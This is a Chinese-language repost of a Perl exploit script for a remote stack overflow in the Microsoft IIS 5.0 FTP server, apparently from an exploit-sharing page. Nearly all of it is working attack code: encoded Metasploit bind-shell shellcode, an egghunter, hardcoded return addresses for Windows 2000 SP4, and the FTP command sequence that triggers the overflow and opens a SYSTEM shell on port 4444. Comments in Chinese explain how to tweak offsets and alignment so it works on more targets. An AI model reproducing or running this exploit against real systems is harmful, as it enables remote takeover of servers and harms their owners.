Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit 中英文通用版

绑定4444端口，Windows 2000 CN + SP4 测试通过，需要能建目录的用户，偏移地址若不通用，请自行修改。

# !/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444

# http://www.offensive-security.com/0day/msftp.pl.txt

use IO :: Socket ;
$ |= 1 ;
$sc = " \x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43 " .
" \x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34 " .
" \x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41 " .
" \x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58 " .
" \x50\x38\x41\x43\x4a\x4a\x49\x45\x36\x4d\x51\x48\x4a\x4b\x4f " .
" \x44\x4f\x47\x32\x46\x32\x42\x4a\x43\x32\x46\x38\x48\x4d\x46 " .
" \x4e\x47\x4c\x45\x55\x51\x4a\x44\x34\x4a\x4f\x48\x38\x46\x34 " .
" \x50\x30\x46\x50\x50\x57\x4c\x4b\x4b\x4a\x4e\x4f\x44\x35\x4a " .
" \x4a\x4e\x4f\x43\x45\x4b\x57\x4b\x4f\x4d\x37\x41\x41 " ;
# ./msfpayload windows/shell_bind_tcp R |  ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

$shell = " T00WT00W " . " \xda\xde\xbd\x2d\xe7\x9b\x9f\x2b\xc9\xb1\x56\xd9\x74\x24\xf4 " .
" \x5a\x83\xea\xfc\x31\x6a\x15\x03\x6a\x15\xcf\x12\x67\x77\x86 " .
" \xdd\x98\x88\xf8\x54\x7d\xb9\x2a\x02\xf5\xe8\xfa\x40\x5b\x01 " .
" \x71\x04\x48\x92\xf7\x81\x7f\x13\xbd\xf7\x4e\xa4\x70\x38\x1c " .
" \x66\x13\xc4\x5f\xbb\xf3\xf5\xaf\xce\xf2\x32\xcd\x21\xa6\xeb " .
" \x99\x90\x56\x9f\xdc\x28\x57\x4f\x6b\x10\x2f\xea\xac\xe5\x85 " .
" \xf5\xfc\x56\x92\xbe\xe4\xdd\xfc\x1e\x14\x31\x1f\x62\x5f\x3e " .
" \xeb\x10\x5e\x96\x22\xd8\x50\xd6\xe8\xe7\x5c\xdb\xf1\x20\x5a " .
" \x04\x84\x5a\x98\xb9\x9e\x98\xe2\x65\x2b\x3d\x44\xed\x8b\xe5 " .
" \x74\x22\x4d\x6d\x7a\x8f\x1a\x29\x9f\x0e\xcf\x41\x9b\x9b\xee " .
" \x85\x2d\xdf\xd4\x01\x75\xbb\x75\x13\xd3\x6a\x8a\x43\xbb\xd3 " .
" \x2e\x0f\x2e\x07\x48\x52\x27\xe4\x66\x6d\xb7\x62\xf1\x1e\x85 " .
" \x2d\xa9\x88\xa5\xa6\x77\x4e\xc9\x9c\xcf\xc0\x34\x1f\x2f\xc8 " .
" \xf2\x4b\x7f\x62\xd2\xf3\x14\x72\xdb\x21\xba\x22\x73\x9a\x7a " .
" \x93\x33\x4a\x12\xf9\xbb\xb5\x02\x02\x16\xc0\x05\xcc\x42\x80 " .
" \xe1\x2d\x75\x36\xad\xb8\x93\x52\x5d\xed\x0c\xcb\x9f\xca\x84 " .
" \x6c\xe0\x38\xb9\x25\x76\x74\xd7\xf2\x79\x85\xfd\x50\xd6\x2d " .
" \x96\x22\x34\xea\x87\x34\x11\x5a\xc1\x0c\xf1\x10\xbf\xdf\x60 " .
" \x24\xea\x88\x01\xb7\x71\x49\x4c\xa4\x2d\x1e\x19\x1a\x24\xca " .
" \xb7\x05\x9e\xe9\x4a\xd3\xd9\xaa\x90\x20\xe7\x33\x55\x1c\xc3 " .
" \x23\xa3\x9d\x4f\x10\x7b\xc8\x19\xce\x3d\xa2\xeb\xb8\x97\x19 " .
" \xa2\x2c\x6e\x52\x75\x2b\x6f\xbf\x03\xd3\xc1\x16\x52\xeb\xed " .
" \xfe\x52\x94\x10\x9f\x9d\x4f\x91\xbf\x7f\x5a\xef\x57\x26\x0f " .
" \x52\x3a\xd9\xe5\x90\x43\x5a\x0c\x68\xb0\x42\x65\x6d\xfc\xc4 " .
" \x95\x1f\x6d\xa1\x99\x8c\x8e\xe0\x90 " ;

print " IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n " ;
if ($ # ARGV ne 1) {
print " usage: iiz5.pl <target> <your local ip>\n " ;
exit ( 0 );
}
srand ( time ());
$port = int ( rand ( 31337 - 1022 )) + 1025 ;
$locip = $ARGV [ 1 ];
$locip =~ s /\./,/ gi;
if ( fork ()) {
$sock = IO :: Socket :: INET -> new(PeerAddr => $ARGV [ 0 ] ,
                              PeerPort => ' 21 ' ,
                              Proto     => ' tcp ' );

# 自行修改以下两个地址以增强通用性, 此俩地址在我机器上测试成功
$patch = " \x7e\xd1\xf9\x7f " ;
$retaddr = " \x9B\xB1\xF4\x77 " ;

# 你可以使用wordexp的这两个跳转地址
#$patch = "\x90\x80\xb7\x6f";
#$retaddr = "\xcd\x60\xb6\x6f";

# 这里也修改了, 多加了两个"K", 因为$myfindsc中
# 用了"repne scasd[edi]"指令来查找Shellcode, 多
# 加两个"K"使其四字节对齐, 否则会找不到（通用性？）
$v = " KKKSEXY " . $sc . " V " x ( 500 - length ( $sc ) - 5 );

# 溢出时堆栈的基本状况
#     |0          |104     | 108   |112       |164     |168    |172     |176
#$c = "A" x 104 . $patch . $patch. "A" x 52 . $patch . "AAAA". $retaddr .$patch."Aa4Aa5Aa6Aa7Aa8Aa9Ab";

#
#void myfindsc()
#{
#    __asm
#    {
#        int 3;
#start:
#        MOV EDX,ESP;
#        FCMOVNBE ST,ST(2);
#        _emit 0xd9;
#        _emit 0x72;
#        _emit 0xf4; FSTENV [edx-0Ch]
#        POP EBP;
#        PUSH EBP;
#        POP EBX;
#        PUSH 76h;
#        POP EAX;
#xorsc:
#        XOR BYTE PTR DS:[EBX+28h],AL; patch "decode" 的0xff
#findsc:
#        MOV EAX,66666666h;
#        SUB EAX,66566666h;
#        PUSH EAX;
#        POP EDI;
#        PUSH 21212121h;
#        POP ECX;
#        MOV EAX,59584553h;
#        REPNE SCAS DWORD PTR ES:[EDI];
#decode:
#        _emit 0x89;
#        _emit 0xE7; JMP EDI
#    }
#}
#
#
#void main()
#{
#    myfindsc();
#}
#

# 修改用于定位Shellcode的代码, 由于该代码需要调
# 用call或者jmp等指令以跳转到Shellcode的地方, 此
# 类指令包含了0xff, 会被IIS过滤, 所以这里采用了自
# 修改的形式将0xff patch掉. 本来想要alpha2加密,
# 但是加密后内容太长.
$myfindsc =
" \x8b\xd4\xdb\xd2\xd9\x72\xf4\x5d\x55\x5b\x6a\x76\x58 " .
" \x30\x43\x27\xb8\x66\x66\x66\x66\x2d\x66\x66\x5F\x66 " .
" \x50\x5f\x68\x21\x21\x21\x21\x59\xb8\x53\x45\x58\x59 " .
" \xf2\xaf\x89\xe7 " ;

$c = $myfindsc . " A " x ( 104 - length ( $myfindsc )) .
     $patch . $patch . " \xEB\x8E\x44\x44 " . " A " x 48 .
#                      |<-- 第二次跳转: 到这里后最终跳到$myfindsc
     $patch . " AAAA " . $retaddr . $patch . " A " x 16 . " \xE2\xAA " . " NN " ;
#                                                   |<-- 第一次跳转: 函数返回以后经过跳转来到这里, 但是$myfindsc太远, 就又跳了一次

$x = < $sock > ;
print $x ;
print $sock " USER anonimoos\r\n " ;
$x = < $sock > ;
print $x ;
print $sock " PASS $shell\r\n " ;
$x = < $sock > ;
print $x ;
print $sock " USER anonimoos\r\n " ;
$x = < $sock > ;
print $x ;
print $sock " PASS $shell\r\n " ;
$x = < $sock > ;
print $x ;

print $sock " USER anonymous\r\n " ;
$x = < $sock > ;
print $x ;
print $sock " PASS anonymous\r\n " ;
$x = < $sock > ;
print $x ;
print $sock " MKD w00t$port\r\n " ;
$x = < $sock > ;
print $x ;
print $sock " SITE $v\r\n " ; # We store shellcode in memory of process (stack)
$x = < $sock > ;
print $x ;
print $sock " SITE $v\r\n " ;
$x = < $sock > ;
print $x ;
print $sock " SITE $v\r\n " ;
$x = < $sock > ;
print $x ;
print $sock " SITE $v\r\n " ;
$x = < $sock > ;
print $x ;
print $sock " SITE $v\r\n " ;
$x = < $sock > ;
print $x ;
print $sock " CWD w00t$port\r\n " ;
$x = < $sock > ;
print $x ;
print $sock " MKD CCCC " . " $c\r\n " ; # 这里也被修改了, 多加了个C, 用于4字节对齐
$x = < $sock > ;
print $x ;
print $sock " PORT $locip, " . int ( $port / 256 ) . " , " . int ( $port % 256 ) . " \r\n " ;
$x = < $sock > ;
print $x ;
# TRIGGER
print $sock " NLST $c*/../C*/\r\n " ;
$x = < $sock > ;
print $x ;
} else {
my $servsock = IO :: Socket :: INET -> new(LocalAddr => " 0.0.0.0 " , LocalPort => $port , Proto => ' tcp ' , Listen => 1 );
die " Could not create socket: $!\n " unless $servsock ;
my $new_sock = $servsock -> accept ();
while ( < $new_sock > ) {
print $_ ;
}
close ( $servsock );
}
# Cheerio,
#
#Kingcope

Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit 中英文通用版

你可能感兴趣的:(Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit 中英文通用版)